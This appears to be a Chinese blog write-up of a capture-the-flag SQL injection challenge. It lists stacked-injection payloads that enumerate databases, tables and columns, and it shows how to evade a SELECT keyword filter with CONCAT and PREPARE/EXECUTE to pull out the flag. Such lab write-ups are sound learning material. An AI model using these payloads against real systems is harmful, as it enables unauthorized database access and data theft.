欢迎光临散文网 会员登陆 & 注册

BUU-Web-[强网杯 2019]随便注1

2021-04-18 18:23 作者:雨落雪辰  | 我要投稿

这是一道SQL注入题

先进行简单是注入操作,发现了敏感库名‘supersqli’【1';show databases;】

当然我们也可以查看其他库里的内容【1';show tables from supersqli;】

要素察觉!

然后我们尝试查看丑表【1';show columns from `1919810931114514`;】注意这里对丑表的表名需要添加反引号``

当我们尝试把flag用SELECT取出时发现SELECT被进行了过滤

这里可以尝试使用堆叠注入,进行预处理【1';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;execute a;】

对使用的命令进行总结

  • show databases;   查看数据库

  • show tables from [databases_name]   查看该数据库中的表名

  • show columns from [table_name]    查看该表中的字段

  • SELSECT [value] from  [columns_name] 查询该字段下的vulue这条数据的内容

  • SET   @b = [XXX]     设置变量@b为xxxx

  • CONCAT(a,b)            将a,b内容进行拼接

  • PREPARE a from @b;       定义预处理语句将预处理语句说明为a

  • EXECUTE a;        执行预处理语句


BUU-Web-[强网杯 2019]随便注1的评论 (共 条)

分享到微博请遵守国家法律